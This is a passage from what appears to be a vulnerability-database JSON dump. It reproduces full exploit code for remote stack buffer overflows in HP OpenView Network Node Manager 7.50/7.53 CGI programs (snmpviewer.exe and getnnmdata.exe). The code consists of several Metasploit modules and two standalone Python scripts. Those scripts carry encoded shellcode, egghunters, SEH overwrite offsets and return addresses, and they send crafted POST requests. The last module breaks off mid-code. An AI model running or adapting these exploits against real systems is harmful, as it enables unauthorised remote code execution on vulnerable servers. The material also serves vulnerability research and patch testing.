The request must contain 'act' and 'app' parameters which, when\n combined, total more than the 1024 byte stack buffer can hold.\n\n It is important to note that this vulnerability must be exploited by overwriting SEH.\n While the saved return address can be smashed, a function call that occurs before\n the function returns calls \"exit\".\n } ,\n 'Author' =>\n [\n 'jduck' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2010-1552' ],\n [ 'OSVDB', '64975' ],\n [ 'BID', '40068' ],\n [ 'ZDI', '10-083' ],\n [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379' ]\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 1024, # 1024 byte buffer..\n 'BadChars' =>\n # Not sure why this one has a different set of bad chars...\n (\n (0x00..0x08).to_a + (0x0b..0x1f).to_a +\n [ 0x21, 0x26, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f ]\n ).pack('C*'),\n 'DisableNops' => true,\n # Manually use FPU to get EIP into ECX\n 'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\",\n 'EncoderOptions' => { 'BufferRegister' => 'ecx' },\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'HP OpenView Network Node Manager 7.53 w/NNM_01201',\n {\n 'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166\n }\n ],\n [ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',\n {\n 'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959\n }\n ],\n [ 'Debug Target',\n {\n 'Ret' => 0xdeadbeef, # crasher\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'May 11 2010'))\n end\n\n def exploit\n\n print_status(\"Trying target #{target.name}...\")\n\n cgi = '/OvCgi/snmpviewer.exe'\n\n # \"ins\" must be \"load\" or \"content\"\n ins_ok = [ 'load', 'content' ]\n ins = ins_ok[rand(ins_ok.length)]\n\n start = 'The specified Application/Action name is not defined.<p>Application:\"'\n #middle = 
'\"<p>Action:\"'\n\n ia32 = Metasm::Ia32.new\n\n # SEH\n seh_offset = 1192\n seh_frame = rand_text(8)\n\n # Jump back to the payload, after p/p/r jumps to us.\n distance = seh_offset - start.length + seh_frame.length # dry run\n jmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\n distance = seh_offset - start.length - jmp_back.length\n distance += 8 if ins == 'content'\n jmp_back = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + distance.to_s).encode_string\n\n # A short jump back to the long jump back :)\n jmp_small = Metasm::Shellcode.assemble(ia32, \"jmp $-\" + jmp_back.length.to_s).encode_string\n\n # Fix up the SEH frame\n seh_frame[0,jmp_small.length] = jmp_small\n seh_frame[4,4] = [target.ret].pack('V')\n\n # Create the buffer\n buf = ''\n buf << payload.encoded\n pad = seh_offset - start.length - buf.length - jmp_back.length\n pad += 8 if ins == 'content'\n buf << rand_text(pad)\n buf << jmp_back\n buf << seh_frame\n\n app = buf\n\n # Force an exception writing off the end of the stack\n action = rand_text(1024)\n\n # Send the request\n if rand(2) > 0\n print_status(\"Sending exploit via POST request (ins=#{ins})...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"POST\",\n 'vars_post' =>\n {\n 'ins' => ins,\n 'act' => action,\n 'app' => app\n }\n }, 3)\n else\n print_status(\"Sending exploit via GET request (ins=#{ins})...\")\n res = send_request_cgi({\n 'uri'\t\t => cgi,\n 'method'\t => \"GET\",\n 'vars_get' =>\n {\n 'ins' => ins,\n 'act' => action,\n 'app' => app\n }\n }, 3)\n end\n\n if res and res.code != 502\n print_error(\"Eek! 
We weren't expecting a response, but we got one\")\n print_status(res.to_s) if datastore['NNM_DEBUG']\n end\n\n handler\n\n end\n\n def wfs_delay\n 5\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:18:12", "description": "", "published": "2010-07-03T00:00:00", "type": "packetstorm", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2010-07-03T00:00:00", "id": "PACKETSTORM:91443", "href": "https://packetstormsecurity.com/files/91443/HP-OpenView-NNM-getnnmdata.exe-CGI-Invalid-ICount-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \n# Date: 2010.07.02 \n# Author: S2 Crew [Hungary] \n# Software Link: hp.com \n# Version: 7.53 \n# Tested on: Windows 2003 \n# CVE: CVE-2010-1554 \n \n# Code : \n \n#!/usr/bin/python \n \nimport struct \nimport socket \nimport httplib \nimport urllib \n \n# calc.exe Windows Execute Command \nsc2 = ( \n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\" \n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\" \n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\" \n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\" \n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\" \n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\" \n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\" \n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\" \n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\" 
\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\" \n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\" \n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\" \n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\" \n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\" \n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\" \n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\" \n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\" \n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\" \n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\" \n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\" \n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\" \n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\" \n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\" \n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\" \n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\" \n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\" \n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\" \n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\" \n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\" \n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\" \n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\" \n) \n \negghunter = ( \n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\" \n\"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\" \n\"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa\" 
\n\"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n) \n \nret = struct.pack('<L',0x5A667A77) # ppr \njmp1 = '\\xeb\\xf9\\x90\\x90' \njmp2 = '\\xeb\\xdd\\x90\\x90\\x90' \n \np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + \"C\"*500 \n \nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2} \n \nc = httplib.HTTPConnection('172.16.29.149') \nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h) \nr = c.getresponse() \n \nprint r.status, r.reason \ndata = r.read() \nprint data \nc.close() \n \nprint \"\\nDone\\n\" \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91443/icount-exec.txt"}, {"lastseen": "2016-12-05T22:18:33", "description": "", "published": "2011-03-24T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2011-03-24T00:00:00", "id": "PACKETSTORM:99674", "href": "https://packetstormsecurity.com/files/99674/HP-OpenView-Network-Node-Manager-getnnmdata.exe-ICount-CGI-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_nnm_getnnmdata_icount.rb 12117 2011-03-23 21:57:16Z mc $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. \nBy sending specially crafted ICount parameter to the getnnmdata.exe CGI, \nan attacker may be able to execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12117 $', \n'References' => \n[ \n[ 'CVE', '2010-1554' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 750, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\", \n'DisableNops' => 'True', \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'ECX', \n}, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7582, 'Ret' => 0x5a01f277 } ], \n[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2052, 'Ret' => 0x5a666d69 } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 11 2010')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \nend \n \ndef exploit \n \negg = rand_text_alpha_upper(4) \n \nhunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\" \nhunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \nboom = rand_text_alpha_upper(target['Offset']) \nboom << generate_seh_record(target.ret) \nboom << hunter + egg + egg \nboom << payload.encoded \nboom 
<< rand_text_alpha_upper(9024 - payload.encoded.length) \n \nsploit = \"SnmpVals=&ICount=-9#{boom}\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_cgi({ \n'uri' => '/OvCgi/getnnmdata.exe', \n'method' => 'POST', \n'data' => sploit \n}, 8) \n \nhandler \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99674/hp_nnm_getnnmdata_icount.rb.txt"}, {"lastseen": "2016-12-05T22:24:18", "description": "", "published": "2010-07-03T00:00:00", "type": "packetstorm", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2010-07-03T00:00:00", "id": "PACKETSTORM:91442", "href": "https://packetstormsecurity.com/files/91442/HP-OpenView-NNM-getnnmdata.exe-CGI-Invalid-MaxAge-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \n# Date: 2010.07.02 \n# Author: S2 Crew [Hungary] \n# Software Link: hp.com \n# Version: 7.53 \n# Tested on: Windows 2003 \n# CVE: CVE-2010-1553 \n \n# Code : \n \n#!/usr/bin/python \n \nimport struct \nimport socket \nimport httplib \nimport urllib \n \n# calc.exe Windows Execute Command \nsc2 = ( \n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\" \n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\" \n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\" \n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\" \n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\" \n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\" \n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\" 
\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\" \n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\" \n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\" \n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\" \n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\" \n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\" \n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\" \n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\" \n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\" \n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\" \n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\" \n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\" \n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\" \n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\" \n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\" \n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\" \n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\" \n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\" \n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\" \n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\" \n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\" \n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\" \n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\" \n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\" \n) \n \negghunter = ( 
\n\"\\x89\\xe1\\xda\\xd7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\" \n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\" \n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\" \n\"\\x50\\x66\\x4f\\x71\\x4b\\x7a\\x49\\x6f\\x46\\x6f\\x50\\x42\\x51\\x42\\x43\" \n\"\\x5a\\x45\\x52\\x43\\x68\\x48\\x4d\\x46\\x4e\\x45\\x6c\\x47\\x75\\x42\\x7a\" \n\"\\x44\\x34\\x48\\x6f\\x4e\\x58\\x42\\x74\\x50\\x30\\x46\\x50\\x42\\x77\\x4c\" \n\"\\x4b\\x4a\\x5a\\x4e\\x4f\\x43\\x45\\x4a\\x4a\\x4c\\x6f\\x43\\x45\\x4a\\x47\" \n\"\\x49\\x6f\\x4b\\x57\\x41\\x41\" \n) \n \nret = struct.pack('<L',0x5A667A77) # ppr \njmp = \"\\x74\\x21\\x44\\x44\" \n \np = 'Topo=X&SnmpLastVal=X&MaxAge='+'A'*2054 + jmp + ret + 'B' * 30 + egghunter \n \nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2} \n \nc = httplib.HTTPConnection('172.16.29.149') \nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h) \nr = c.getresponse() \n \nprint r.status, r.reason \ndata = r.read() \nprint data \nc.close() \n \nprint \"\\nDone\\n\" \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/91442/getnnmdata-exec.txt"}, {"lastseen": "2016-12-05T22:24:03", "description": "", "published": "2011-03-24T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2011-03-24T00:00:00", "id": "PACKETSTORM:99672", "href": "https://packetstormsecurity.com/files/99672/HP-OpenView-Network-Node-Manager-getnnmdata.exe-MaxAge-CGI-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_nnm_getnnmdata_maxage.rb 12117 2011-03-23 21:57:16Z mc $ \n## \n \n## \n# This file is part of the 
Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53. \nBy sending specially crafted MaxAge parameter to the getnnmdata.exe CGI, \nan attacker may be able to execute arbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12117 $', \n'References' => \n[ \n[ 'CVE', '2010-1553' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 750, \n'BadChars' => \"\\x00\", \n'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\", \n'DisableNops' => 'True', \n'EncoderType' => Msf::Encoder::Type::AlphanumUpper, \n'EncoderOptions' => \n{ \n'BufferRegister' => 'ECX', \n}, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ], \n[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 11 2010')) \n \nregister_options( [ Opt::RPORT(80) ], self.class ) \nend \n \ndef exploit \n \negg = rand_text_alpha_upper(4) \n \nhunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\" \nhunter << \"\\xef\\xb8\" + egg + 
\"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\" \n \nboom = rand_text_alpha_upper(target['Offset']) \nboom << generate_seh_record(target.ret) \nboom << hunter + egg + egg \nboom << payload.encoded \nboom << rand_text_alpha_upper(9024 - payload.encoded.length) \n \nsploit = \"SnmpVals=&MaxAge=#{boom}\" \n \nprint_status(\"Trying target #{target.name}...\") \n \nsend_request_cgi({ \n'uri' => '/OvCgi/getnnmdata.exe', \n'method' => 'POST', \n'data' => sploit \n}, 8) \n \nhandler \n \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/99672/hp_nnm_getnnmdata_maxage.rb.txt"}, {"lastseen": "2016-12-05T22:16:34", "description": "", "published": "2011-03-24T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "modified": "2011-03-24T00:00:00", "id": "PACKETSTORM:99673", "href": "https://packetstormsecurity.com/files/99673/HP-OpenView-Network-Node-Manager-snmpviewer.exe-Buffer-Overflow.html", "sourceData": "`## \n# $Id: hp_nnm_snmpviewer_actapp.rb 12098 2011-03-23 15:47:20Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. 
\n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \nHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/snmpviewer.exe', :pattern => /Hewlett-Packard Development Company/ } \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Seh \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53 \nprior to NNM_01203. By making a specially crafted HTTP request to the \"snmpviewer.exe\" \nCGI program, an attacker can cause a stack-based buffer overflow and execute arbitrary \ncode. \n \nThe vulnerable code lies within the a function within \"snmpviewer.exe\" with a \ntimestamp prior to April 7th, 2010. This vulnerability is triggerable via either a GET \nor POST request. The request must contain 'act' and 'app' parameters which, when \ncombined, total more than the 1024 byte stack buffer can hold. \n \nIt is important to note that this vulnerability must be exploited by overwriting SEH. \nWhile the saved return address can be smashed, a function call that occurs before \nthe function returns calls \"exit\". \n} , \n'Author' => \n[ \n'jduck' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12098 $', \n'References' => \n[ \n[ 'CVE', '2010-1552' ], \n[ 'OSVDB', '64975' ], \n[ 'BID', '40068' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-083/' ], \n[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 1024, # 1024 byte buffer.. \n'BadChars' => \n# Not sure why this one has a different set of bad chars... 
\n( \n(0x00..0x08).to_a + (0x0b..0x1f).to_a + \n[ 0x21, 0x26, 0x3c, 0x3e, 0x5b, 0x5d, 0x5e, 0x60, 0x7e, 0x7f ] \n).pack('C*'), \n'DisableNops' => true, \n# Manually use FPU to get EIP into ECX \n'PrependEncoder' => \"\\x89\\xe2\\xdb\\xdb\\xd9\\x72\\xf4\\x59\\x83\\xe9\\xf7\", \n'EncoderOptions' => { 'BufferRegister' => 'ecx' }, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'HP OpenView Network Node Manager 7.53 w/NNM_01201', \n{ \n'Ret' => 0x5a238ba7, # pop edx/pop ebp/ret - in ovsnmp.dll v1.30.10.9166 \n} \n], \n[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)', \n{ \n'Ret' => 0x71c069dd, # pop edx/pop ecx/ret - in ws2_32.dll v5.2.3790.3959 \n} \n], \n[ 'Debug Target', \n{ \n'Ret' => 0xdeadbeef, # crasher \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'May 11 2010')) \n \nregister_options( \n[ \nOpt::RPORT(80), \n], self.class) \nend \n \ndef exploit \n \nprint_status(\"Trying target #{target.name}...\") \n \ncgi = '/OvCgi/snmpviewer.exe' \n \n# \"ins\" must be \"load\" or \"content\" \nins_ok = [ 'load', 'content' ] \nins = ins_ok[rand(ins_ok.length)] \n \nstart = 'The specified Application/Action name is not defined.<p>Application:\"' \n#middle = '\"<p>Action:\"' \n \nia32 = Metasm::Ia32.new \n \n# SEH \nseh_offset = 1192 \nseh_frame = rand_text(8) \n \n# Jump back to the payload, after p/p/r jumps to us. 
